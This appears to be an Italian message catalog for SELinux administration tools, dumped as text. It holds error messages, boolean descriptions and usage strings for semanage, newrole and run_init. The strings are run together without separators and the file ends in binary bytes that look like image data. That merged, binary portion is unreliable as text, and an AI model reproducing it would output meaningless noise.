Impossibile eseguire la transazione semanageImpossibile creare l'utente SELinux per %sImpossibile creare una chiave per %sImpossibile creare una chiave per %s/%sImpossibile creare un indirizzo per %sImpossibile creare il contesto per %sImpossibile creare il contesto per %s/%sImpossibile creare contesto del file per %sImpossibile creare l'interfaccia per %sImpossibile creare la chiave per %sImpossibile creare il login mapping per %sImpossibile creare la porta per %s/%sImpossibile creare la gestione semanageImpossibile eliminare l'utente SELinux %sImpossibile eliminare l'indirizzo %sImpossibile eliminare la booleana %sImpossibile eliminare il contesto del file per %sImpossibile eliminare l'interfaccia %sImpossibile eliminare il login mapping per %sImpossibile eliminare la porta %s/%sImpossibile eliminare il contesto del file %sImpossibile eliminare la porta %sNon si può determinare la modalità enforcing.
Impossibile stabilire connessione semanageImpossibile estrarre la chiave per %sImpossibile elencare i moduli SELinuxImpossibile elencare gli utenti SELinuxImpossibile elencare gli indirizziImpossibile elencare le booleaneImpossibile elencare i contesti del fileImpossibile elencare le interfacceImpossibile elencare i contesti del file localeImpossibile elencare i login mappingsImpossibile elencare le porteImpossibile elencare i ruoli per l'utente %sImpossibile elencare i contesti del fileImpossibile elencare le porteImpossibile modificare l'utente SELinux %sImpossibile modificare l'indirizzo %sImpossibile modificare la booleana %sImpossibile modificare il contesto del file per %sImpossibile modificare l'interfaccia %sImpossibile modificare login mapping per %sImpossibile modificare la porta %s/%sImpossibile aprire il file %s
Impossibile interrogare l'indirizzo %sImpossibile interrogare il contesto del file %sImpossibile interrogare il contesto del file per %sImpossibile interrogare l'interfaccia %sImpossibile interrogare la porta %s/%sImpossibile interrogare seuser per %sImpossibile interrogare l'utente per %sImpossibile rimuovere il dominio permissive %s (rimozione fallita)Impossibile impostare il livello MLS per %sImpossibile impostare range MLS per %sImpossibile impostare utente SELinux per %sImpossibile impostare il valore attivo della booleana %sImpossibile impostare il contesto indirizzo per %sImpossibile impostare il contesto exec su %s.
Impossibile impostare il contesto del file per %sImpossibile impostare il contesto dell'interfaccia per %sImpossibile impostare una maschera per %sImpossibile impostare il contesto dei messaggi per %sImpossibile impostare i campi mls nel contesto indirizzo per %sImpossibile impostare i campi mls nel contesto del file per %sImpossibile impostare i campi mls nel contesto dell'interfaccia per %sImpossibile impostare i campi mls nel contesto della porta per %s/%sImpossibile impostare nome per %sImpossibile impostare il dominio permissive %s (installazione del modulo fallita)Impossibile impostare il contesto della porta per %s/%sImpossibile impostare il ruolo nel contesto indirizzo per %sImpossibile impostare il ruolo nel contesto del file per %sImpossibile impostare il ruolo nel contesto dell'interfaccia per %sImpossibile impostare il ruolo nel contesto della porta per %s/%sImpossibile impostare il tipo nel contesto indirizzo per %sImpossibile impostare il tipo nel contesto del file per %sImpossibile impostare il tipo nel contesto dell'interfaccia per %sImpossibile impostare il tipo nel contesto della porta per %s/%sImpossibile impostare l'utente nel contesto indirizzo per %sImpossibile impostare l'utente nel contesto del file per %sImpossibile impostare l'utente nel contesto dell'interfaccia per %sImpossibile impostare l'utente nel contesto della porta per %s/%sImpossibile avviare transazione semanageImpossibile verificare lo stato MLS abilitatoNon si può determinare il tipo predefinito.
Crea/Manipola i file temporanei in /tmpCronModalità Enforcing correntePersonalizzatoDemone di sistema DBUSDatabaseCancella %sCancella contesto del fileCancella porta di reteCancella mappatura utente SELinux %sCancella utenteDescrizioneDisabilita auditDisabilita la protezione SELinux per il Cluster serverDisabilita la protezione SELinux per EvolutionDisabilita la protezione SELinux per il demone HalDisabilita protezione SELinux per il demone della password NISDisabilita protezione SELinux per il NIS Transfer DaemonDisabilita la protezione SELinux per NetworkManagerDisabilita la protezione SELinux per ThunderbirdDisabilita protezione SELinux per il demone acctDisabilita la protezione SELinux per amandaDisabilita la protezione SELinux per amavisDisabilita la protezione SELinux per il demone apmdDisabilita la protezione SELinux per il demone arpwatchDisabilita la protezione SELinux per il demone auditdDisabilita la protezione SELinux per il demone automountDisabilita la protezione SELinux per avahiDisabilita la protezione SELinux per il demone bluetoothDisabilita la protezione SELinux per il demone cannaDisabilita la protezione SELinux per il demone cardmgrDisabilita la protezione SELinux per il demone cipedDisabilita la protezione SELinux per il demone clamdDisabilita la protezione SELinux per clamscanDisabilita la protezione SELinux per clvmdDisabilita la protezione SELinux per il demone comsatDisabilita la protezione SELinux per il demone courierDisabilita la protezione SELinux per il demone cpucontrolDisabilita la protezione SELinux per il demone cpuspeedDisabilita la protezione SELinux per il demone crondDisabilita la protezione SELinux per il demone hplip di cupsDisabilita la protezione SELinux per il server backend di cupsdDisabilita la protezione SELinux per il demone cupsdDisabilita la protezione SELinux per cupsd_lpdDisabilita la protezione SELinux per il demone cvsDisabilita la protezione SELinux per il demone cyrusDisabilita la protezione SELinux per il demone dbskkdDisabilita la protezione SELinux per il demone dbusdDisabilita la protezione SELinux per dccdDisabilita la protezione SELinux per dccifdDisabilita la protezione SELinux per dccmDisabilita la protezione SELinux per il demone ddtDisabilita la protezione SELinux per il demone devfsdDisabilita la protezione SELinux per il demone dhcpcDisabilita la protezione SELinux per il demone dhcpdDisabilita la protezione SELinux per il demone dictdDisabilita la protezione SELinux per il demone distccdDisabilita la protezione SELinux per il demone dmesgDisabilita la protezione SELinux per il demone dnsmasqDisabilita la protezione SELinux per il demone dovecotDisabilita la protezione SELinux per il demone entropydDisabilita la protezione SELinux per fetchmailDisabilita la protezione SELinux per il demone fingerdDisabilita la protezione SELinux per il demone freshclamDisabilita la protezione SELinux per il demone fsdaemonDisabilita la protezione SELinux per i giochiDisabilita la protezione SELinux per il demone gpmDisabilita la protezione SELinux per il demone gssDisabilita la protezione SELinux per il demone hostnameDisabilita la protezione SELinux per il demone hotplugDisabilita la protezione SELinux per il demone howlDisabilita la protezione SELinux per http suexecDisabilita la protezione SELinux per httpd rotatelogDisabilita la protezione SELinux per il demone hwclockDisabilita la protezione SELinux per il demone i18nDisabilita la protezione SELinux per il demone imazesrvDisabilita la protezione SELinux per il demone figlio inetdDisabilita la protezione SELinux per il demone inetdDisabilita la protezione SELinux per il demone inndDisabilita la protezione SELinux per il demone iptablesDisabilita la protezione SELinux per il demone ircdDisabilita la protezione SELinux per il demone irqbalanceDisabilita la protezione SELinux per il demone iscsiDisabilita la protezione SELinux per il demone jabberdDisabilita la protezione SELinux per il demone kadmindDisabilita la protezione SELinux per il demone klogdDisabilita la protezione SELinux per il demone krb5kdcDisabilita la protezione SELinux per il demone ktalkDisabilita la protezione SELinux per il demone kudzuDisabilita la protezione SELinux per il demone locateDisabilita la protezione SELinux per il demone lpdDisabilita la protezione SELinux per il demone lrrdDisabilita la protezione SELinux per il demone lvmDisabilita la protezione SELinux per mailmanDisabilita la protezione SELinux per il demone mdadmDisabilita la protezione SELinux per il demone monopdDisabilita la protezione SELinux per il demone mrtgDisabilita la protezione SELinux per il demone mysqldDisabilita la protezione SELinux per il demone nagiosDisabilita la protezione SELinux per il demone namedDisabilita la protezione SELinux per il demone nessusdDisabilita la protezione SELinux per il demone nfsdDisabilita la protezione SELinux per il demone nmbdDisabilita la protezione SELinux per il demone nrpeDisabilita la protezione SELinux per il demone nscdDisabilita la protezione SELinux per il demone nsdDisabilita la protezione SELinux per il demone ntpdDisabilita la protezione SELinux per oddjobDisabilita la protezione SELinux per oddjob_mkhomedirDisabilita la protezione SELinux per il demone openvpnDisabilita la protezione SELinux per il demone pamDisabilita la protezione SELinux per pegasusDisabilita la protezione SELinux per il demone perditionDisabilita la protezione SELinux per il demone portmapDisabilita la protezione SELinux per il demone portslaveDisabilita la protezione SELinux per postfixDisabilita la protezione SELinux per il demone postgresqlDisabilita protezione SELinux per pptpDisabilita protezione SELinux per il demone prelinkDisabilita protezione SELinux per il demone privoxyDisabilita protezione SELinux per il demone ptalDisabilita protezione SELinux per il demone pxeDisabilita protezione SELinux per pyzordDisabilita protezione SELinux per il demone quotaDisabilita protezione SELinux per il demone radiusdDisabilita protezione SELinux per il demone radvdDisabilita protezione SELinux per rdiscDisabilita protezione SELinux per readaheadDisabilita protezione SELinux per restorecondDisabilita protezione SELinux per il demone rhgbDisabilita protezione SELinux per ricciDisabilita protezione SELinux per ricci_modclusterdDisabilita protezione SELinux per il demone rlogindDisabilita protezione SELinux per il demone rpcdDisabilita protezione SELinux per rshdDisabilita protezione SELinux per il demone rsyncDisabilita protezione SELinux per il demone saslauthdDisabilita protezione SELinux per il demone scannerdaemonDisabilita protezione SELinux per il demone sendmailDisabilita protezione SELinux per setransDisabilita protezione SELinux per il demone setroubleshootDisabilita protezione SELinux per il demone slapdDisabilita protezione SELinux per il demone slrnpullDisabilita protezione SELinux per il demone smbdDisabilita protezione SELinux per il demone snmpdDisabilita protezione SELinux per il demone snortDisabilita protezione SELinux per il demone soundDisabilita protezione SELinux per il demone sounddDisabilita protezione SELinux per il demone spamdDisabilita protezione SELinux per il demone speedmgmtDisabilita protezione SELinux per il demone squidDisabilita protezione SELinux per il demone sshDisabilita protezione SELinux per il demone stunnelDisabilita protezione SELinux per il demone swatDisabilita protezione SELinux per il demone sxidDisabilita protezione SELinux per il demone syslogdDisabilita protezione SELinux per i cron job del sistemaDisabilita protezione SELinux per il demone tcpDisabilita protezione SELinux per il demone telnetDisabilita protezione SELinux per il demone tftpdDisabilita la protezione SELinux per i web browserDisabilita protezione SELinux per il demone transproxyDisabilita protezione SELinux per il demone udevDisabilita protezione SELinux per il demone umlDisabilita protezione SELinux per il demone updfstabDisabilita protezione SELinux per il demone uptimedDisabilita protezione SELinux per il demone uucpdDisabilita protezione SELinux per il demone vmwareDisabilita protezione SELinux per il demone watchdogDisabilita protezione SELinux per il demone winbindDisabilita protezione SELinux per il demone xdmDisabilita protezione SELinux per il controllo di xenDisabilita protezione SELinux per il demone xenDisabilita protezione SELinux per il demone xfsDisabilita protezione SELinux per il demone ypbindDisabilita protezione SELinux per il demone ypservDisabilitatoDisabilitato
Permissivo
Enforcing
Non permettere ad alcun processo di caricare i moduli del kernelNon permettere ad alcun processo di modificare la policy SELinux del kernelNon permettere la transizione a sysadm_t, sudo e su sono affettiNon eseguire l'audit degli oggetti che sappiamo essere corrotti ma che non rappresentano alcun rischio della sicurezzaModifica porta di reteAbilita auditAbilita/Disabilita le regole audit aggiuntive generalemente non riportate nei file di log.EnforcingInserire il percorso completo per confinare l'eseguibile.Inserire il percorso completo sullo script init usato per avviare l'applicazione confinata.Inserire un nome unico per un ruolo utente o applicazione confinata.Errore di allocazione memoria.
Errore nell'allocazione di argv0 della shell.
Errore cambio uid, abbandono.
Errore di connessione al sistema audit.
Errore rilascio capacità SETUID, abbandono
Errore rilascio capacità, abbandono
Errore nel liberare caps
Errore inizializzazione capacità, abbandono.
Errore reimpostazione KEEPCAPS, abbandono
Errore di invio messaggio audit.
Errore impostazione KEEPCAPS, abbandono
Errore impostazione capacità, abbandono.
Errore!  Impossibile aprire %s.
Errore!  La shell non è valida.
Errore: livelli multipli specificati
Errore: ruoli multipli specificati
Errore: tipi multipli specificati
Errore: non siete autorizzati a cambiare livelli su di un terminale non sicuro 
EseguibileUtenti esistentiUtente_esistenteImpossibile chiudere correttamente tty
Specifiche
del fileTipo
di fileFile dei contesti del fileFile LabelingSpecifiche del fileTipo di fileIl contesto del file per %s è definito nella policy, non può essere eliminatoIl contesto del file per %s non è definitoFiltroGPLGiochiGenera nuovo modulo della policyVista del gruppoServizio HTTPDScript initInteragisce con il terminaleL'interfaccia %s è definita nella policy, non può essere eliminataL'interfaccia %s non è definitaFile dell'interfacciaInternet Services Daemon (inetd)Internet Services Daemon sono demoni avviati da xinetdSpecifiche non valide del fileKerberosEtichettareIl gruppo linux %s non esisteL'utente linux %s non esisteVista elencoCarica modulo della policyCarica modulo della policyBloccaggio...Nome
di loginIl login '%s' è necessarioNome di registrazioneIl login mapping per %s è definito nella policy, non può essere eliminatoIl login mapping per %s non è definitoLivello MCSGamma MCSMLSMLS/Gamma MCS/
MLSLivello MLS/
MCSGamma MLS/MCSProtezione memoriaRuolo utente del terminale minimoRuolo utente X Windows minimoModifica %sModifica contesto del fileModifica mappatura utente SELinuxModifica utenteModifica una voce esistente dell'utente di registrazione.Modulo %s.pp già caricato nella policy corrente.
Desideri continuare?Nome della policyMountNFSNISNomeNome servizioConfigurazione di retePorta di reteNessun contesto nel file %s
L'indirizzo del nodo è necessarioLa netmask del nodo è necessariaNon ancora implementatoErrore opzioni %s Memoria esaurita!
Password:PermissivoPolgenDirectory della policyModulo della policyPortaPorta %s/%s già definitaLa porta %s/%s è definita nella policy, non può essere eliminataLa porta %s/%s non è definitaNumero portaE' richiesta la portaNumero porta "%s" non valido.  0 < PORT_NUMBER < 65536 Le porte devono essere numeri o una gamma di numeri da 1 a %d PrefissoStampaDominio dei processiProtoProtocolloE' richiesto il protocollo udp o tcpRed Hat 2007Rietichetta al riavvio successivo.Rimuovi modulo della policy caricabileRichiede almeno una categoriaRichiede prefisso o ruoloRichiede prefisso, ruolo, livello o rangeRichiede setypeRichiede setype o serangeRichiesto setype, serange o seuserRichiede seuser o serangeRitorna le impostazioni booleane in default del sistemaRuoloRuolo utente amministratore rootEsegue l'autocomposizione di bloccaggio booleaneServer per l'autenticazione SASLSELinux
UtenteAmministrazione SELinuxInterfaccia di SELinuxTool di generazione della policy di SELinuxTipo di
porta di SELinuxTipo di porta SELinuxRuoli SELinuxProtezione del servizio di SELiunxTipo di SELinuxE' richiesto un Tipo SELinuxUtente di SELinuxBooleana di SELinuxfcontext di SELinuxLa policy SELinux non è amministrata o non si può accedere al deposito.L'utente SELinux %s è definito nella policy, non può essere eliminatoL'utente SELinux %s non è definitoE' richiesto l'utente '%s' di SELinuxSSHSambaSeleziona oggetto di gestioneSeleziona porteSelezionare il Ruolo utente amministratore root, se l'utente verrà impiegato per amministrare la macchina operando come utente root.  Il suddetto utente non sarà in grado di eseguire il login diretto sul sistema.Selezionare la directory per generare i file della policy inSelezionare le directory che l'applicazione confinata possiede o nelle quali scriveSelezionare il file eseguibile da confinare.Selezionare i file che l'applicazione confinata crea o scriveSelezionare se si desidera rietichettare l'intero file system al prossimo riavvio.  La rietichettatura può richiedere un tempo notevole, dependente dalla grandezza del sistema.  Se si sta cambiando tipi di policy o cambiando da disabilitato a enforcing, una rietichettatura è necessaria.Selezionare il file dello script init da confinare.Selezionare i domini che si desidera che questo utente amministri.Selezionare i ruoli utente che eseguiranno la transizione a questi domini delle applicazioni. Tipo di file
SelinuxUna transazione semanage è già in esecuzioneTransazione semanage non in esecuzioneInvia messaggi auditInvia emailScript d'impostazioneSpiacente, -l può essere usato con il supporto SELinux MLS.
Spiacente, newrole può essere usato solo su un kernel SELinux.
Spiacente, run_init può essere usato solo su un kernel SELinux.
Spam ProtectionSquidDemone init standardIl demone init standard è un demone avviato al momento dell'avvio tramite gli script init.  Generalmente richiede uno script in /etc/init.dStatoModalità Enforcing predefinita del sistemaTipo di policy predefinita del sistema: Questo utente può registrarsi ad una macchina tramite X o terminale.  Per default il suddetto utente non avrà alcun setuid, nessun networking, no sudo, e no suQuesto utente eseguirà la registrazione solo tramite un terminale o un login remoto.  Per default il suddetto utente non avrà alcun setuid, no networking, no su e no sudo.Per attivare questo pacchetto della policy eseguire:Attiva/Disattiva tra Personalizzata e Tutte booleaneAttiva/Disattiva tra Personalizzata e Tutte le porteAttiva/Disattiva tra tutte e contesto personalizzato del fileTransizione utente di SELinux staff su Web Browser DomainTransizione utente di SELinux sysadm su Web Browser DomainTransizione utente di SELinux user su Web Browser DomainTransizione utente di SELinux xguest su Web Browser DomainTipo %s_t già definito nella policy corrente.
Desideri continuare?File tipo enforcementE' richiesto il TipoUSO: run_init <script> <args ...>
   dove: <script> è il nome dell'init script da eseguire,
         <args ...> sono gli argomenti per quello script.I tipi USER ottengono automaticamente un tipo tmpImpossibile assegnare memoria per new_contextImpossibile ripulire l'ambiente
Impossibile ottenere un segnale vuoto
Impossibile ripristinare l'ambiente, abbandono
Impossibile ripristinare l'etichetta tty...
Impossibile impostare SIGHUP handler
Tunnel SSL universaleProtocollo mancante o sconosciutoPorte non riservate (>1024)Uso %s -LUso %s -L -l utenteUso %s -d File ...Uso %s -l -d utente ...Uso %s -l CATEGORIA utente ...Uso %s -l [[+|-]CATEGORIA],...]q utente ...Uso %s CATEGORIA File ...Uso %s [[+|-]CATEGORIA],...]q File ...Usate -- per la lista delle opzioni.  Ad esempioUser ApplicationUna User Application rappresenta qualsiasi applicazione che desiderate confinare avviata da un utenteMappatura utentePriv utenteRuolo utenteUtente con un network completo, nessuna applicazione setuid senza transizione, no su, può eseguire il sudo nei ruoli di amministrazione rootUtente con networking conpleto, nessuna applicazione setuid senza transizione, no sudo e no su.Utilizza Pam per l'autenticazioneUtilizza dbusUtilizza le chiamate getpw* o nsswitchVerifica nomeVersioneAvvertenza!  Impossibile recuperare informazioni tty.
Attenzione! Impossibile ripristinare il contesto per %s
Web Application/Script (CGI)Web ApplicationScript CGI Web Applications/Script (CGI) vengono avviati dal server web (apache)Scrive i messaggi syslog	XENXServerSi deve aggiungere almeno un ruolo per %sÈ necessario inserire un eseguibileÈ necessario inserire un nome per il vostro processo/utente confinatoÈ necessario inserire il percorso eseguibile per il vostro processo confinatoÈ necessario selezionare un utenteE' necessario specificare uno dei seguenti valori: %s_Cancella_ProprietàTutte/itutti i files
file regolari
directory
device a carattere
device a blocchi
socket
link simbolici
named pipe
autenticazione fallita.
impossibile trovare entry valide nel file passwd.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererrore durante la lettura della configurazione del servizio PAM.
creazione nuovo range con livello %s fallita
conversione nuovo contesto in stringa fallita
esecuzione shell fallita
impossibile ottenere informazioni sull'account.
determinazione nuovo contesto fallita.
determinazione vecchio contesto fallita.
inizializzazione di PAM fallita
impostazione di PAM_TTY fallita
impostazione nuovo range %s fallita
impostazione nuovo ruolo %s fallita
impostazione nuovo tipo %s fallita
getpass non può aprire /dev/tty
globalelabel37label38label39label41label42label44label50label59newrole:  %s:  errore sulla riga %lu.
newrole: fallimento forking: %snewrole: password non corretta per %s
newrole: overflow della tabella hash di configurazione dei nomi del servizio
offonpppdrsyncrun_init: password non corretta per %s
system-config-selinuxFrancesco Tombolini <tombo@adamantio.net>.
Silvio Pierro <perplesso82@gmail.com>.tiposconosciutoutilizzo:  %s [-qi]
use_syslog deve essere un valore boolean
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`